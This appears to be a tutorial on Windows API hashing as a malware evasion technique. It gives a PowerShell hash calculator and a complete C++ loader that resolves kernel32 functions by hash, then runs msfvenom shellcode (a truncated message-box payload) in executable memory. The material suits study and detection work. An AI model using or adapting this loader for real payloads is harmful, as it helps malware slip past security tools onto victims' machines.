Windows API Hashing to Malware

Windows API Hashing is a common technique used by malware to obfuscate the API calls they make to the operating system. This technique makes static analysis and detection by security solutions such as EDR (Endpoint Detection and Response) and antivirus (AV) more difficult. Instead of calling API functions directly by name, the malware computes a hash of the function name and uses this hash to dynamically resolve the function’s address at runtime.

How Does It Work?

Rather than referencing API function names directly, malware calculates a hash based on the function name it intends to call. When the malware executes, it parses the Export Table of loaded DLLs (such as kernel32.dll, user32.dll, etc.), which contains all the exported functions. The malware then applies the same hashing algorithm to the exported function names and compares the resulting hash to its pre-calculated hashes. If a match is found, it retrieves the corresponding function address and invokes it.

Ordinals and Hashing

Some malware may also rely on ordinals when resolving API functions, especially if a consistent ordinal number is associated with a specific function. This offers a shortcut, as ordinals are fixed in certain DLLs. However, using hashes is a more common technique as it does not rely on static ordinals and offers flexibility across different operating systems or versions where ordinals might change.

PowerShell Script to Extract API Hashes

The script below demonstrates how to calculate API hashes using PowerShell. It iterates through a list of API function names, calculates their hash values, and detects any hash collisions. This script is useful for understanding how malware developers may compute these hashes at runtime.

function Calculate-ApiHash {
    param (
        [string]$apiName
    )
    
    $hash = 0x35

    $apiName.ToCharArray() | ForEach-Object {
        $l = $_
        $c = [int64][char]$l
        
        $hash = (($hash * 0xab10f29f) + $c -band 0xFFFFFF)
    }

    return $hash
}

function Check-HashCollision {
    param (
        [hashtable]$hashTable, 
        [string]$apiName,      
        [int64]$hash           
    )

    if ($hashTable.ContainsKey($hash)) {
        $existingApi = $hashTable[$hash]
        if ($existingApi -ne $apiName) {
            Write-Host "Hash collision detected! API '$apiName' and API '$existingApi' share the same hash: 0x$([string]::Format("{0:X}", $hash))" -ForegroundColor Red
        }
    } else {
        $hashTable[$hash] = $apiName
    }
}

$APIsToHash = @("CreateThread", "VirtualAlloc", "LoadLibraryA", "CreateFileA", "CreateThread")

# Hashtable to store hashes and detect collisions
$hashes = @{}

$APIsToHash | ForEach-Object {
    $api = $_
    
    $hash = Calculate-ApiHash -apiName $api
    
    $hashHex = '0x{0:X}' -f $hash
    Write-Host "API: $api, Hash: $hashHex"
    
    Check-HashCollision -hashTable $hashes -apiName $api -hash $hash
}

This PowerShell script calculates a hash for a given API function name and checks for collisions. If two API names generate the same hash, it will alert you to the collision.

This technique is an excellent introduction to how malware developers generate and utilize hashes for API function resolution.

C++ Implementation for Resolving Functions by Hash

Below is a C++ implementation that resolves API function addresses dynamically based on pre-calculated hash values. It uses the CalculateHash function to generate a hash for each exported function name in a module (like kernel32.dll). If the hash matches a known target hash, it retrieves the corresponding function address and uses it.

#include <Windows.h>
#include <iostream>

DWORD CalculateHash(const char* functionName) {
    DWORD hash = 0x35;  

    while (*functionName) {
        hash = (hash * 0xab10f29f) + (*functionName);
        hash &= 0xFFFFFF;  
        functionName++;
    }

    return hash;
}

HMODULE GetModuleBase(const char* moduleName) {
    HMODULE hModule = GetModuleHandleA(moduleName);
    return hModule;
}

FARPROC ResolveFunctionByHash(HMODULE hModule, DWORD targetHash) {
    if (!hModule) return nullptr;

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);

    DWORD exportDirRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    PIMAGE_EXPORT_DIRECTORY exportDir = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule + exportDirRVA);

    DWORD* namesRVA = (DWORD*)((BYTE*)hModule + exportDir->AddressOfNames);

    for (DWORD i = 0; i < exportDir->NumberOfNames; i++) {
        const char* functionName = (const char*)((BYTE*)hModule + namesRVA[i]);

        DWORD hash = CalculateHash(functionName);

        if (hash == targetHash) {
            WORD ordinal = ((WORD*)((BYTE*)hModule + exportDir->AddressOfNameOrdinals))[i];

            DWORD functionRVA = ((DWORD*)((BYTE*)hModule + exportDir->AddressOfFunctions))[ordinal];
            FARPROC functionAddress = (FARPROC)((BYTE*)hModule + functionRVA);

            return functionAddress;
        }
    }

    return nullptr;  
}

// msfvenom -p windows/x64/messagebox TEXT=hello TITLE=hello -f c 
unsigned char shellcode[] = "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"...";  // shortened for brevity

int main() {
    DWORD hashVirtualAlloc = 0xE0DABF;
    DWORD hashCreateThread = 0xF92F7B;
    DWORD hashWaitForSingleObject = CalculateHash("WaitForSingleObject");

    std::cout << "Hash calculated for WaitForSingleObject: 0x" << std::hex << hashWaitForSingleObject << std::endl;

    HMODULE hKernel32 = GetModuleBase("kernel32.dll");

    if (!hKernel32) {
        std::cerr << "Could not retrieve the base address of kernel32.dll.\n";
        return -1;
    }

    typedef LPVOID(WINAPI* pVirtualAlloc_t)(LPVOID, SIZE_T, DWORD, DWORD);
    pVirtualAlloc_t pVirtualAlloc = (pVirtualAlloc_t)ResolveFunctionByHash(hKernel32, hashVirtualAlloc);
    if (!pVirtualAlloc) {
        std::cerr << "Could not find VirtualAlloc.\n";
        return -1;
    }
    std::cout << "Hash calculated for VirtualAlloc: 0x" << std::hex << hashVirtualAlloc << std::endl;

    typedef HANDLE(WINAPI* pCreateThread_t)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
    pCreateThread_t pCreateThread = (pCreateThread_t)ResolveFunctionByHash(hKernel32, hashCreateThread);
    if (!pCreateThread) {
        std::cerr << "Could not find CreateThread.\n";
        return -1;
    }
    std::cout << "Hash calculated for CreateThread: 0x" << std::hex << hashCreateThread << std::endl;

    typedef DWORD(WINAPI* pWaitForSingleObject_t)(HANDLE, DWORD);
    pWaitForSingleObject_t pWaitForSingleObject = (pWaitForSingleObject_t)ResolveFunctionByHash(hKernel32, hashWaitForSingleObject);
    if (!pWaitForSingleObject) {
        std::cerr << "Could not find WaitForSingleObject.\n";
        return -1;
    }

    std::cout << "Hash calculated for WaitForSingleObject: 0x" << std::hex << hashWaitForSingleObject << std::endl;

    LPVOID execMem = pVirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!execMem) {
        std::cerr << "Failed to allocate memory.\n";
        return -1;
    }

    memcpy(execMem, shellcode, sizeof(shellcode));

    HANDLE hThread = pCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)execMem, NULL, 0, NULL);
    if (!hThread) {
        std::cerr << "Failed to create thread.\n";
        return -1;
    }

    pWaitForSingleObject(hThread, INFINITE);

    return 0;
}

In this image, we can see the output of a Windows API Hashing program. The program calculates the hash values for several API functions: VirtualAlloc, CreateThread, and WaitForSingleObject.

  • The calculated hash for WaitForSingleObject is 0x397566.

  • The hash for VirtualAlloc is 0xe0dabf.

  • The hash for CreateThread is 0xf92f7b.

  • The hash for WaitForSingleObject is displayed twice, confirming that the same hash value is used when calculated both before and after the function resolution process.

On the right side, a message box is displayed with the title "hello" and the text "joas". This message box is generated as a result of executing shellcode that invokes the MessageBox function. The shellcode likely contains pre-configured instructions to display this message box, which is shown once the shellcode is executed in memory after resolving the necessary APIs dynamically using the hashing mechanism demonstrated.

This showcases the correct functioning of both the API hashing process and the execution of shellcode, dynamically resolving API functions during runtime without directly referencing the function names.

Conclusion

Windows API hashing is an advanced technique often used by malware to obfuscate its use of system calls, making it more challenging for security solutions to detect malicious behavior. By calculating hash values for API functions instead of referencing them by name, malware can resolve functions dynamically, avoiding direct detection in static analysis. This technique is useful for malware developers but is also a good exercise for ethical hackers and reverse engineers seeking to understand and combat sophisticated threats. The scripts and code provided above demonstrate the basic principles of API hashing and how it can be implemented both in PowerShell and C++.

Last updated